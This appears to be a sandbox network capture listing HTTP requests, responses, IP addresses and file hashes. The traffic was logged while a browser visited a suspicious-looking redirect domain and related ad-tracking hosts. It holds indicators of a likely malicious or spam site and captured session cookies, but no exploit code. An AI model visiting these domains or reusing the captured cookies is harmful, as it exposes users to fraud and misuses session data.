Sha256: 4638b368eed6bc1821c4631ef446139f80555f12500020a3b6716f43b7877cee
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Cache-Control: max-age=113992
Date: Sun, 02 Dec 2018 13:09:48 GMT
Etag: "5c02ecfe-1d7"
Expires: Mon, 03 Dec 2018 20:49:40 GMT
Last-Modified: Sat, 01 Dec 2018 20:20:14 GMT
Server: ECS (ska/F6FC)
X-Cache: HIT
Content-Length: 471


--- Additional Info ---
Magic:  data
Size:   471
Md5:    18f66a6465427c1ca5477b007371c29c
Sha1:   80ed81bafb9565a7236ba002695e3c2d92c198a7
Sha256: ca5922da318644627668c22eb8f2d78eb976793c6af295a39ad9f38f56b2c139
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Cache-Control: max-age=158508
Date: Sun, 02 Dec 2018 13:09:48 GMT
Etag: "5c039a6b-1d7"
Expires: Tue, 04 Dec 2018 09:11:36 GMT
Last-Modified: Sun, 02 Dec 2018 08:40:11 GMT
Server: ECS (ska/F710)
X-Cache: HIT
Content-Length: 471


--- Additional Info ---
Magic:  data
Size:   471
Md5:    8004eef45dc173fcc8c370d58cadca21
Sha1:   ce3448ec0a95d942c0fe350b8416dc7ad72755ce
Sha256: a32d7bfc238a9ad2687d1acc3eccbc8bda306be42697506ffa812eacc90e7139
                                        
                                            GET /bootstrap/4.1.0/css/bootstrap.min.css HTTP/1.1 
Host: stackpath.bootstrapcdn.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://savegreatdowngradetheclicks.icu/BVUVFoZxerYpDSmHQ-sNwmEo6TxLdQfZu9Z7A8IxpYA?cid=5c03d99cf50336000148e369&sid=14857833

                                         
                                         209.197.3.15
HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
                                        
Date: Sun, 02 Dec 2018 13:09:48 GMT
Connection: Keep-Alive
Accept-Ranges: bytes
Etag: "1523290490"
Cache-Control: max-age=31536000
Content-Encoding: gzip
Content-Length: 21024
Last-Modified: Mon, 09 Apr 2018 16:14:50 GMT
X-Hello-Human: Say hello back! @getBootstrapCDN on Twitter
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
X-Cache: HIT


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   21024
Md5:    46a8807a81c3415e4fa7875bedcec419
Sha1:   63f51858e774b8bcdd24adcd06d635ca8d2f0baa
Sha256: f0c23cfbe5421f7d70e0be422f5773a67a68af2b8c267845f3c948b875c83611
                                        
                                            GET /releases/v5.4.2/css/all.css HTTP/1.1 
Host: use.fontawesome.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://savegreatdowngradetheclicks.icu/BVUVFoZxerYpDSmHQ-sNwmEo6TxLdQfZu9Z7A8IxpYA?cid=5c03d99cf50336000148e369&sid=14857833

                                         
                                         23.111.9.35
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Date: Sun, 02 Dec 2018 13:09:48 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Access-Control-Max-Age: 3000
Last-Modified: Thu, 25 Oct 2018 22:14:30 GMT
Etag: W/"b4d08b13c5d88326fe4bea239e050253"
Cache-Control: max-age=31556926
Server: NetDNA-cache/2.2
Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
X-Cache: HIT
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   12622
Md5:    e473300f8a29a365098bbf584941e244
Sha1:   bf4167e3f88499a96d165c53cb7d4881f124d170
Sha256: 555bbdff8cd18659475ffa76bf1fc7855af443d63e6a04f59148ffbcf5bf4943
                                        
GET /e7XlF9aC3ApxItFSfWIJyJHxyO7A78QzFQNCxJ0z8f4?cid=5c03d99cf50336000148e369&sid=14857833 HTTP/1.1
Host: savegreatdowngradetheclicks.icu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://savegreatdowngradetheclicks.icu/BVUVFoZxerYpDSmHQ-sNwmEo6TxLdQfZu9Z7A8IxpYA?cid=5c03d99cf50336000148e369&sid=14857833
Cookie: session=afea4cdb-408c-4169-b389-a3c0a206c214

                                         
51.158.26.248
HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 02 Dec 2018 13:09:48 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx


--- Additional Info ---
                                        
GET /favicon.ico HTTP/1.1
Host: adsheads.go2affise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: afclick=5c03d99cf50336000148e369

                                         
212.32.250.1
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: nginx
Date: Sun, 02 Dec 2018 13:09:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   125
Md5:    239540730a71a3ab34f1c0f1f87ae03e
Sha1:   4fd8d8975e2d3404e8ac5e2721c1b647ae65d59c
Sha256: 36d5cec09fddadf8132407e8f8c56956c85367dc3d598a1531214a55cca6b368
                                        
GET /favicon.ico HTTP/1.1
Host: www.hibids10.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: u_pl=14857833; ain=eyJhbGciOiJIUzI1NiJ9.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.0yQfas0mSX2SrLkckf1-RGYzfoLKPnggQ1RcLVp9E9s; cjs=t; uid_id2=bbf6d23b-e76e-4292-af73-4b78c5667cc7:2:2; iprc9c4cc1faa645553fd9829e3120285a43=1674341; pdhtkv=true; uncs=1; pdhtkv28=true; uncs28=1

                                         
199.193.73.38
HTTP/1.1 200 OK
Content-Type: image/x-icon
Server: nginx/1.15.1
Date: Sun, 02 Dec 2018 13:09:49 GMT
Content-Length: 0
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Strict-Transport-Security: max-age=0; includeSubdomains


--- Additional Info ---
                                        
GET /favicon.ico HTTP/1.1
Host: 1bloorwestcondo.ca
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: cnt_utm=1

                                         
108.167.172.145
HTTP/1.1 200 OK
Content-Type: image/vnd.microsoft.icon
Server: nginx/1.14.0
Date: Sun, 02 Dec 2018 13:09:49 GMT
Content-Length: 0
Connection: keep-alive


--- Additional Info ---
                                        
GET /releases/v5.4.2/webfonts/fa-solid-900.woff HTTP/1.1
Host: use.fontawesome.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://use.fontawesome.com/releases/v5.4.2/css/all.css
Origin: https://savegreatdowngradetheclicks.icu

                                         
23.111.9.35
HTTP/1.1 200 OK
Content-Type: application/font-woff
Date: Sun, 02 Dec 2018 13:09:51 GMT
Content-Length: 92800
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Access-Control-Max-Age: 3000
Last-Modified: Thu, 25 Oct 2018 22:15:23 GMT
Etag: "09bc9e8c7d6dfdace635ea073974db13"
Cache-Control: max-age=31556926
Server: NetDNA-cache/2.2
Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
X-Cache: HIT
Accept-Ranges: bytes


--- Additional Info ---
Magic:  data
Size:   92800
Md5:    09bc9e8c7d6dfdace635ea073974db13
Sha1:   50c62598dd73ce1083157f003c9e81e57f2a5c32
Sha256: aeb0f1c1fe8fb697d2c733a508cd73d4da778b600003bf6d726e89eec0a60cf6
                                        
GET /favicon.ico HTTP/1.1
Host: 1bloorwestcondo.ca
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: cnt_utm=1

                                         
0.0.0.0


--- Additional Info ---